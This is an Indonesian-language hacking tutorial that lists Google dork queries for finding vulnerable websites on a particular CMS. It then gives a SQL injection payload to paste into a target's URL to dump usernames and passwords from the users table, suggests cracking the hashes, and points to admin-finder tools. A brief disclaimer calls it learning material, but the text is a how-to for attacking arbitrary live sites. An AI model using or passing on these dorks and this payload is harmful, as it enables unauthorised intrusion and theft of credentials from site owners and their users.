Hacking Website Tanpa Menggunakan Tools
Dork :
inurl:kategori-23-hiburan.html
inurl:hal-tentang-kami.html
inurl:statis-1-pengantar.html
inurl:statis-19-beasiswa.html
inurl:statis-22-kerjasama.html
inurl:/statis-1-profil.html
inurl:/statis-2-profil.html
inurl:/statis-3-profil.html
Setelah memasukan dork di dalam search google, selanjutnya kita akan menemui beberapa website yang memiliki celah keamanan. kita pilih website / target web yang akan kita exploit. Selanjutnya pastekan exploit di dalam url website target, Berikut script Exploitnya :
'union select /*!50000Concat*/(username,0x20,password)+from+users--+--+
Selanjutnya jika berhasil kita akan melihat username dan password website tersebut, sampai disini kita sudah berhasil menemukan password dan usernamenya. Jika passwordnya di encryt kita bisa decrypt password tersebut. di perlukan pengetahuan tentang kriptograpi contoh (md5, sha512 dll)
untuk mencari halaman adminnya, sobat bisa menggunakan tools hacking seperti admin finder dan sebagainya.
Catatan : ini hanya sebagai pembelajaran tentang keamanan suatu website
Untuk menjadi seorang polisi yang baik kita harus menjadi seorang penjahat terlebih dahulu, Oke guys Semoga bermanfaat dan harimu menyenangkan.